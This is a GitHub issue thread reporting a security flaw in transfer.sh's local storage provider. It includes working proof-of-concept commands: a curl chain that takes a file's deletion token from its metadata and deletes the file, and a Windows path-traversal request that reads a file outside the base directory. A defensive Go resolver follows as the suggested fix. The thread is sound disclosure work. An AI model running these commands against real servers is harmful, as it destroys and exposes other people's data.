[Security] Arbitrary reading of data from backing local storage provider #210

Closed
opened 2026-01-19 18:29:26 +00:00 by michael · 2 comments
Owner

Originally created by @cheeseandcereal on GitHub.

Right now, the server does not require that a file's `.metadata` neighboring file has to exist before serving it due to this logic: https://github.com/dutchcoders/transfer.sh/blob/8a5c7371408c4e76a798ace93fecd94ea9c6c38e/server/handlers.go#L616-L621

This is an extreme oversight, as it leads to serious security implications.

Firstly, given the known URL of an item on the server, you can freely read its metadata, which includes its delete token, and simply delete it.

POC:

```sh
URL='http://localhost:8080/dRz9w/thing'
curl -X DELETE "$URL/$(curl $URL.metadata | jq -r .DeletionToken)"
echo "And poof. It's gone"
```

However, even worse than this, it's allowing arbitrary traversal and reading of the filesystem if the provider is local and is not using a posix-style path such as windows. Take the following directory tree:

```
C:\USERS\ME\DOWNLOADS
├── data
│   └── AHWlO
│       ├── test.txt
│       └── test.txt.metadata
├── private.txt
└── transfersh.exe
```

Now start transfersh.exe like so:

```bat
C:\USERS\ME\DOWNLOADS\transfersh.exe --provider local --basedir C:\USERS\ME\DOWNLOADS\data
```

Now run the following curl:

```bat
curl localhost:8080/AHWlO/..\..\private.txt
```

And the server will happily read and send the contents of private.txt in the response body.

This is obviously extremely dangerous and should be patched/released and possibly some sort of deprecation/security warning should be given about all previous releases.
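A hardened path resolver for a local storage provider, added here as an example and not transfer.sh's own code: it normalises backslashes before containment checking so a Windows-style `..\..\private.txt` is rejected on every platform, refuses to serve the `.metadata` sidecar itself (it carries the deletion token), and requires that sidecar to exist before a file is served. The function and error names are hypothetical.

```go
package main

import (
	"errors"
	"fmt"
	"os"
	"path/filepath"
	"strings"
)

var ErrOutsideBase = errors.New("path escapes base directory")
var ErrSidecarRequest = errors.New("metadata sidecar may not be served")
var ErrNoSidecar = errors.New("metadata sidecar missing; refusing to serve")

// resolveForServing maps <basedir>/<token>/<filename> to an on-disk path and applies
// the three checks the issue calls for. Hypothetical helper, not the project's code.
func resolveForServing(basedir, token, filename string) (string, error) {
	if strings.HasSuffix(filename, ".metadata") {
		return "", ErrSidecarRequest
	}
	base, err := filepath.Abs(basedir)
	if err != nil {
		return "", err
	}
	// Treat backslashes as separators even on POSIX so "..\..\x" is traversal everywhere.
	rel := filepath.FromSlash(strings.ReplaceAll(token+"/"+filename, "\\", "/"))
	full := filepath.Join(base, rel) // Join cleans ".." segments
	r, err := filepath.Rel(base, full)
	if err != nil || r == ".." || strings.HasPrefix(r, ".."+string(filepath.Separator)) {
		return "", ErrOutsideBase
	}
	if _, err := os.Stat(full + ".metadata"); err != nil {
		return "", ErrNoSidecar
	}
	return full, nil
}

func main() {
	// Constructed layout mirroring the issue: <base>/AHWlO/test.txt plus its sidecar.
	base, _ := os.MkdirTemp("", "transfer-example")
	defer os.RemoveAll(base)
	_ = os.MkdirAll(filepath.Join(base, "AHWlO"), 0o700)
	_ = os.WriteFile(filepath.Join(base, "AHWlO", "test.txt"), []byte("hi"), 0o600)
	_ = os.WriteFile(filepath.Join(base, "AHWlO", "test.txt.metadata"), []byte("{}"), 0o600)
	_, err := resolveForServing(base, "AHWlO", `..\..\private.txt`)
	fmt.Println("traversal attempt:", err)
}
```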

Author
Owner

@cheeseandcereal commented on GitHub:

Yeah, sorry @aspacca. I was looking for a security contact, but couldn't find anything in the repository. Probably worth putting something here to prevent that in the future: https://github.com/dutchcoders/transfer.sh/security/policy

Author
Owner

@paolafrancesca commented on GitHub:

good catch @cheeseandcereal , I would have preferred a responsible disclosure anyway (https://en.wikipedia.org/wiki/Responsible_disclosure)


Reference: dutchcoders/transfer.sh#210